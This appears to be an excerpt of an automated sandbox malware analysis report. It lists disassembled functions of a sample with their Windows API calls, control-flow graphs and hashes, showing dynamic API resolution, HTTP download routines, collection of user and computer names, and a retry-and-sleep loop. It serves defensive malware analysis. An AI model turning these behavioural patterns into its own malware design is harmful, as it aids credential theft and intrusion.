                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: d6aa9594f857ee5f41f8461fa122f27f094ceabd6d8fc1681a1bc98c3d98889d
                        • Instruction ID: ac2807f5742916fe5c5a0435d03d6f2188ce05d91a273781be4e7cce64a536e7
                        • Opcode Fuzzy Hash: d6aa9594f857ee5f41f8461fa122f27f094ceabd6d8fc1681a1bc98c3d98889d
                        • Instruction Fuzzy Hash: C10181B1A05208EFC710DF98DD46BABFBBCFB45B21F10461AFA45E3280D77559008BA1
                        Function 009A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009911B7), ref: 009A7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 009A789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 5d7a168a6963c99725ddbb050b841e8b9f431d395082eabca2fc9172169c6a58
                        • Instruction ID: 16871dff328e3544e86f2ac6ae1e8dcc4fe580cfaa4a1a5ea825b280eb5bad74
                        • Opcode Fuzzy Hash: 5d7a168a6963c99725ddbb050b841e8b9f431d395082eabca2fc9172169c6a58
                        • Instruction Fuzzy Hash: 47F04FB1945208ABC700DF98DD4ABAEFBB8EB05711F10065AFA05A3680D77919048BE1
                        Function 00991160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 0a9f093446c365be50bbde347b10efb9297ca13476d3f4a3da8759efd5e1ca1c
                        • Instruction ID: 1716d6e9f48a133467c37d91a5716631a505ef001282782f780300e4bffce330
                        • Opcode Fuzzy Hash: 0a9f093446c365be50bbde347b10efb9297ca13476d3f4a3da8759efd5e1ca1c
                        • Instruction Fuzzy Hash: 85D05E7490530DDBCB00DFE0D8496DDBB78FB08312F000596D90563340EE306881CAA6
                        Function 009A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 9a9c10-9a9c1a 634 9a9c20-9aa031 GetProcAddress * 43 633->634 635 9aa036-9aa0ca LoadLibraryA * 8 633->635 634->635 636 9aa0cc-9aa141 GetProcAddress * 5 635->636 637 9aa146-9aa14d 635->637 636->637 638 9aa153-9aa211 GetProcAddress * 8 637->638 639 9aa216-9aa21d 637->639 638->639 640 9aa298-9aa29f 639->640 641 9aa21f-9aa293 GetProcAddress * 5 639->641 642 9aa337-9aa33e 640->642 643 9aa2a5-9aa332 GetProcAddress * 6 640->643 641->640 644 9aa41f-9aa426 642->644 645 9aa344-9aa41a GetProcAddress * 9 642->645 643->642 646 9aa428-9aa49d GetProcAddress * 5 644->646 647 9aa4a2-9aa4a9 644->647 645->644 646->647 648 9aa4ab-9aa4d7 GetProcAddress * 2 647->648 649 9aa4dc-9aa4e3 647->649 648->649 650 9aa515-9aa51c 649->650 651 9aa4e5-9aa510 GetProcAddress * 2 649->651 652 9aa612-9aa619 650->652 653 9aa522-9aa60d GetProcAddress * 10 650->653 651->650 654 9aa61b-9aa678 GetProcAddress * 4 652->654 655 9aa67d-9aa684 652->655 653->652 654->655 656 9aa69e-9aa6a5 655->656 657 9aa686-9aa699 GetProcAddress 655->657 658 9aa708-9aa709 656->658 659 9aa6a7-9aa703 GetProcAddress * 4 656->659 657->656 659->658
                        APIs
                        • GetProcAddress.KERNEL32(75900000,015A62E0), ref: 009A9C2D
                        • GetProcAddress.KERNEL32(75900000,015A6400), ref: 009A9C45
                        • GetProcAddress.KERNEL32(75900000,015B8F88), ref: 009A9C5E
                        • GetProcAddress.KERNEL32(75900000,015B8EF8), ref: 009A9C76
                        • GetProcAddress.KERNEL32(75900000,015BCA48), ref: 009A9C8E
                        • GetProcAddress.KERNEL32(75900000,015BCA00), ref: 009A9CA7
                        • GetProcAddress.KERNEL32(75900000,015AB5B8), ref: 009A9CBF
                        • GetProcAddress.KERNEL32(75900000,015BCAC0), ref: 009A9CD7
                        • GetProcAddress.KERNEL32(75900000,015BC8E0), ref: 009A9CF0
                        • GetProcAddress.KERNEL32(75900000,015BC820), ref: 009A9D08
                        • GetProcAddress.KERNEL32(75900000,015BC9D0), ref: 009A9D20
                        • GetProcAddress.KERNEL32(75900000,015A6460), ref: 009A9D39
                        • GetProcAddress.KERNEL32(75900000,015A6300), ref: 009A9D51
                        • GetProcAddress.KERNEL32(75900000,015A6320), ref: 009A9D69
                        • GetProcAddress.KERNEL32(75900000,015A6480), ref: 009A9D82
                        • GetProcAddress.KERNEL32(75900000,015BC958), ref: 009A9D9A
                        • GetProcAddress.KERNEL32(75900000,015BC838), ref: 009A9DB2
                        • GetProcAddress.KERNEL32(75900000,015AB388), ref: 009A9DCB
                        • GetProcAddress.KERNEL32(75900000,015A64E0), ref: 009A9DE3
                        • GetProcAddress.KERNEL32(75900000,015BC970), ref: 009A9DFB
                        • GetProcAddress.KERNEL32(75900000,015BC880), ref: 009A9E14
                        • GetProcAddress.KERNEL32(75900000,015BC8C8), ref: 009A9E2C
                        • GetProcAddress.KERNEL32(75900000,015BCA90), ref: 009A9E44
                        • GetProcAddress.KERNEL32(75900000,015A6420), ref: 009A9E5D
                        • GetProcAddress.KERNEL32(75900000,015BC988), ref: 009A9E75
                        • GetProcAddress.KERNEL32(75900000,015BC808), ref: 009A9E8D
                        • GetProcAddress.KERNEL32(75900000,015BC898), ref: 009A9EA6
                        • GetProcAddress.KERNEL32(75900000,015BC850), ref: 009A9EBE
                        • GetProcAddress.KERNEL32(75900000,015BC868), ref: 009A9ED6
                        • GetProcAddress.KERNEL32(75900000,015BCAD8), ref: 009A9EEF
                        • GetProcAddress.KERNEL32(75900000,015BC8B0), ref: 009A9F07
                        • GetProcAddress.KERNEL32(75900000,015BC9E8), ref: 009A9F1F
                        • GetProcAddress.KERNEL32(75900000,015BCA18), ref: 009A9F38
                        • GetProcAddress.KERNEL32(75900000,015B9E28), ref: 009A9F50
                        • GetProcAddress.KERNEL32(75900000,015BC928), ref: 009A9F68
                        • GetProcAddress.KERNEL32(75900000,015BC8F8), ref: 009A9F81
                        • GetProcAddress.KERNEL32(75900000,015A64A0), ref: 009A9F99
                        • GetProcAddress.KERNEL32(75900000,015BCA78), ref: 009A9FB1
                        • GetProcAddress.KERNEL32(75900000,015A6340), ref: 009A9FCA
                        • GetProcAddress.KERNEL32(75900000,015BCAA8), ref: 009A9FE2
                        • GetProcAddress.KERNEL32(75900000,015BC910), ref: 009A9FFA
                        • GetProcAddress.KERNEL32(75900000,015A6360), ref: 009AA013
                        • GetProcAddress.KERNEL32(75900000,015A6380), ref: 009AA02B
                        • LoadLibraryA.KERNEL32(015BC7F0,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA03D
                        • LoadLibraryA.KERNEL32(015BC940,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA04E
                        • LoadLibraryA.KERNEL32(015BC9A0,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA060
                        • LoadLibraryA.KERNEL32(015BC9B8,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA072
                        • LoadLibraryA.KERNEL32(015BCA30,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA083
                        • LoadLibraryA.KERNEL32(015BCA60,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA095
                        • LoadLibraryA.KERNEL32(015BCDA8,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA0A7
                        • LoadLibraryA.KERNEL32(015BCB38,?,009A5CA3,009B0AEB,?,?,?,?,?,?,?,?,?,?,009B0AEA,009B0AE3), ref: 009AA0B8
                        • GetProcAddress.KERNEL32(75FD0000,015A67A0), ref: 009AA0DA
                        • GetProcAddress.KERNEL32(75FD0000,015BCD78), ref: 009AA0F2
                        • GetProcAddress.KERNEL32(75FD0000,015B8B30), ref: 009AA10A
                        • GetProcAddress.KERNEL32(75FD0000,015BCD90), ref: 009AA123
                        • GetProcAddress.KERNEL32(75FD0000,015A6760), ref: 009AA13B
                        • GetProcAddress.KERNEL32(73B30000,015AAFC8), ref: 009AA160
                        • GetProcAddress.KERNEL32(73B30000,015A6960), ref: 009AA179
                        • GetProcAddress.KERNEL32(73B30000,015AB0E0), ref: 009AA191
                        • GetProcAddress.KERNEL32(73B30000,015BCC88), ref: 009AA1A9
                        • GetProcAddress.KERNEL32(73B30000,015BCD48), ref: 009AA1C2
                        • GetProcAddress.KERNEL32(73B30000,015A69E0), ref: 009AA1DA
                        • GetProcAddress.KERNEL32(73B30000,015A66E0), ref: 009AA1F2
                        • GetProcAddress.KERNEL32(73B30000,015BCBF8), ref: 009AA20B
                        • GetProcAddress.KERNEL32(763B0000,015A6740), ref: 009AA22C
                        • GetProcAddress.KERNEL32(763B0000,015A6880), ref: 009AA244
                        • GetProcAddress.KERNEL32(763B0000,015BCD18), ref: 009AA25D
                        • GetProcAddress.KERNEL32(763B0000,015BCCA0), ref: 009AA275
                        • GetProcAddress.KERNEL32(763B0000,015A67C0), ref: 009AA28D
                        • GetProcAddress.KERNEL32(750F0000,015AB2C0), ref: 009AA2B3
                        • GetProcAddress.KERNEL32(750F0000,015AB2E8), ref: 009AA2CB
                        • GetProcAddress.KERNEL32(750F0000,015BCD30), ref: 009AA2E3
                        • GetProcAddress.KERNEL32(750F0000,015A6980), ref: 009AA2FC
                        • GetProcAddress.KERNEL32(750F0000,015A69A0), ref: 009AA314
                        • GetProcAddress.KERNEL32(750F0000,015AB270), ref: 009AA32C
                        • GetProcAddress.KERNEL32(75A50000,015BCC28), ref: 009AA352
                        • GetProcAddress.KERNEL32(75A50000,015A69C0), ref: 009AA36A
                        • GetProcAddress.KERNEL32(75A50000,015B8BA0), ref: 009AA382
                        • GetProcAddress.KERNEL32(75A50000,015BCCB8), ref: 009AA39B
                        • GetProcAddress.KERNEL32(75A50000,015BCD60), ref: 009AA3B3
                        • GetProcAddress.KERNEL32(75A50000,015A6840), ref: 009AA3CB
                        • GetProcAddress.KERNEL32(75A50000,015A67E0), ref: 009AA3E4
                        • GetProcAddress.KERNEL32(75A50000,015BCBC8), ref: 009AA3FC
                        • GetProcAddress.KERNEL32(75A50000,015BCCD0), ref: 009AA414
                        • GetProcAddress.KERNEL32(75070000,015A6820), ref: 009AA436
                        • GetProcAddress.KERNEL32(75070000,015BCDC0), ref: 009AA44E
                        • GetProcAddress.KERNEL32(75070000,015BCC40), ref: 009AA466
                        • GetProcAddress.KERNEL32(75070000,015BCDD8), ref: 009AA47F
                        • GetProcAddress.KERNEL32(75070000,015BCAF0), ref: 009AA497
                        • GetProcAddress.KERNEL32(74E50000,015A6800), ref: 009AA4B8
                        • GetProcAddress.KERNEL32(74E50000,015A68C0), ref: 009AA4D1
                        • GetProcAddress.KERNEL32(75320000,015A6900), ref: 009AA4F2
                        • GetProcAddress.KERNEL32(75320000,015BCB08), ref: 009AA50A
                        • GetProcAddress.KERNEL32(6F060000,015A6700), ref: 009AA530
                        • GetProcAddress.KERNEL32(6F060000,015A6A00), ref: 009AA548
                        • GetProcAddress.KERNEL32(6F060000,015A6A20), ref: 009AA560
                        • GetProcAddress.KERNEL32(6F060000,015BCB80), ref: 009AA579
                        • GetProcAddress.KERNEL32(6F060000,015A6680), ref: 009AA591
                        • GetProcAddress.KERNEL32(6F060000,015A6860), ref: 009AA5A9
                        • GetProcAddress.KERNEL32(6F060000,015A68E0), ref: 009AA5C2
                        • GetProcAddress.KERNEL32(6F060000,015A6940), ref: 009AA5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 009AA5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 009AA607
                        • GetProcAddress.KERNEL32(74E00000,015BCB20), ref: 009AA629
                        • GetProcAddress.KERNEL32(74E00000,015B8B10), ref: 009AA641
                        • GetProcAddress.KERNEL32(74E00000,015BCB98), ref: 009AA659
                        • GetProcAddress.KERNEL32(74E00000,015BCB50), ref: 009AA672
                        • GetProcAddress.KERNEL32(74DF0000,015A68A0), ref: 009AA693
                        • GetProcAddress.KERNEL32(6F9A0000,015BCCE8), ref: 009AA6B4
                        • GetProcAddress.KERNEL32(6F9A0000,015A6920), ref: 009AA6CD
                        • GetProcAddress.KERNEL32(6F9A0000,015BCD00), ref: 009AA6E5
                        • GetProcAddress.KERNEL32(6F9A0000,015BCB68), ref: 009AA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 72246b2395600fb8c628d345e91e01ceb19441f4e6df1cc0111d14b91220797a
                        • Instruction ID: b5bf85401771d907b7686cb75c9d53133d5630ef67a6923578e417b371f6c83f
                        • Opcode Fuzzy Hash: 72246b2395600fb8c628d345e91e01ceb19441f4e6df1cc0111d14b91220797a
                        • Instruction Fuzzy Hash: 20624AB5602241AFC344DFA8EDB8956BBF9F74C301704851BAA09C3264FE3A9941DF57
                        Function 00996280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 996280-99630b call 9aa7a0 call 9947b0 call 9aa740 InternetOpenA StrCmpCA 1040 99630d 1033->1040 1041 996314-996318 1033->1041 1040->1041 1042 996509-996525 call 9aa7a0 call 9aa800 * 2 1041->1042 1043 99631e-996342 InternetConnectA 1041->1043 1061 996528-99652d 1042->1061 1044 996348-99634c 1043->1044 1045 9964ff-996503 InternetCloseHandle 1043->1045 1048 99635a 1044->1048 1049 99634e-996358 1044->1049 1045->1042 1051 996364-996392 HttpOpenRequestA 1048->1051 1049->1051 1053 996398-99639c 1051->1053 1054 9964f5-9964f9 InternetCloseHandle 1051->1054 1056 99639e-9963bf InternetSetOptionA 1053->1056 1057 9963c5-996405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 99642c-99644b call 9a8940 1057->1059 1060 996407-996427 call 9aa740 call 9aa800 * 2 1057->1060 1067 9964c9-9964e9 call 9aa740 call 9aa800 * 2 1059->1067 1068 99644d-996454 1059->1068 1060->1061 1067->1061 1071 9964c7-9964ef InternetCloseHandle 1068->1071 1072 996456-996480 InternetReadFile 1068->1072 1071->1054 1076 99648b 1072->1076 1077 996482-996489 1072->1077 1076->1071 1077->1076 1080 99648d-9964c5 call 9aa9b0 call 9aa8a0 call 9aa800 1077->1080 1080->1072
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • InternetOpenA.WININET(009B0DFE,00000001,00000000,00000000,00000000), ref: 009962E1
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 00996303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00996335
                        • HttpOpenRequestA.WININET(00000000,GET,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00996385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009963BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009963D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009963FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0099646D
                        • InternetCloseHandle.WININET(00000000), ref: 009964EF
                        • InternetCloseHandle.WININET(00000000), ref: 009964F9
                        • InternetCloseHandle.WININET(00000000), ref: 00996503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 1b199e8e12f08f8ad25e3c5b742c997ce105ac16a557ab8e3896653a6412e88f
                        • Instruction ID: 0f049b5fafb9787eb4cc4d9989f8160f5b27b77ec724f8f6bf1d83fcf2d36406
                        • Opcode Fuzzy Hash: 1b199e8e12f08f8ad25e3c5b742c997ce105ac16a557ab8e3896653a6412e88f
                        • Instruction Fuzzy Hash: C0716F71A00218ABDF14DFE4CC59BEEB778BB84700F108199F50A6B1D0DBB56A85CF92
                        Function 009A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 9a5510-9a5577 call 9a5ad0 call 9aa820 * 3 call 9aa740 * 4 1106 9a557c-9a5583 1090->1106 1107 9a55d7-9a564c call 9aa740 * 2 call 991590 call 9a52c0 call 9aa8a0 call 9aa800 call 9aaad0 StrCmpCA 1106->1107 1108 9a5585-9a55b6 call 9aa820 call 9aa7a0 call 991590 call 9a51f0 1106->1108 1134 9a5693-9a56a9 call 9aaad0 StrCmpCA 1107->1134 1137 9a564e-9a568e call 9aa7a0 call 991590 call 9a51f0 call 9aa8a0 call 9aa800 1107->1137 1124 9a55bb-9a55d2 call 9aa8a0 call 9aa800 1108->1124 1124->1134 1140 9a56af-9a56b6 1134->1140 1141 9a57dc-9a5844 call 9aa8a0 call 9aa820 * 2 call 991670 call 9aa800 * 4 call 9a6560 call 991550 1134->1141 1137->1134 1142 9a57da-9a585f call 9aaad0 StrCmpCA 1140->1142 1143 9a56bc-9a56c3 1140->1143 1272 9a5ac3-9a5ac6 1141->1272 1161 9a5991-9a59f9 call 9aa8a0 call 9aa820 * 2 call 991670 call 9aa800 * 4 call 9a6560 call 991550 1142->1161 1162 9a5865-9a586c 1142->1162 1146 9a571e-9a5793 call 9aa740 * 2 call 991590 call 9a52c0 call 9aa8a0 call 9aa800 call 9aaad0 StrCmpCA 1143->1146 1147 9a56c5-9a5719 call 9aa820 call 9aa7a0 call 991590 call 9a51f0 call 9aa8a0 call 9aa800 1143->1147 1146->1142 1250 9a5795-9a57d5 call 9aa7a0 call 991590 call 9a51f0 call 9aa8a0 call 9aa800 1146->1250 1147->1142 1161->1272 1167 9a598f-9a5a14 call 9aaad0 StrCmpCA 1162->1167 1168 9a5872-9a5879 1162->1168 1197 9a5a28-9a5a91 call 9aa8a0 call 9aa820 * 2 call 991670 call 9aa800 * 4 call 9a6560 call 991550 1167->1197 1198 9a5a16-9a5a21 Sleep 1167->1198 1174 9a587b-9a58ce call 9aa820 call 9aa7a0 call 991590 call 9a51f0 call 9aa8a0 call 9aa800 1168->1174 1175 9a58d3-9a5948 call 9aa740 * 2 call 991590 call 9a52c0 call 9aa8a0 call 9aa800 call 9aaad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 9a594a-9a598a call 9aa7a0 call 991590 call 9a51f0 call 9aa8a0 call 9aa800 1175->1276 1197->1272 1198->1106 1250->1142 1276->1167
                        APIs
                          • Part of subcall function 009AA820: lstrlen.KERNEL32(00994F05,?,?,00994F05,009B0DDE), ref: 009AA82B
                          • Part of subcall function 009AA820: lstrcpy.KERNEL32(009B0DDE,00000000), ref: 009AA885
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5857
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5228
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5318
                          • Part of subcall function 009A52C0: lstrlen.KERNEL32(00000000), ref: 009A532F
                          • Part of subcall function 009A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 009A5364
                          • Part of subcall function 009A52C0: lstrlen.KERNEL32(00000000), ref: 009A5383
                          • Part of subcall function 009A52C0: lstrlen.KERNEL32(00000000), ref: 009A53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 009A5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
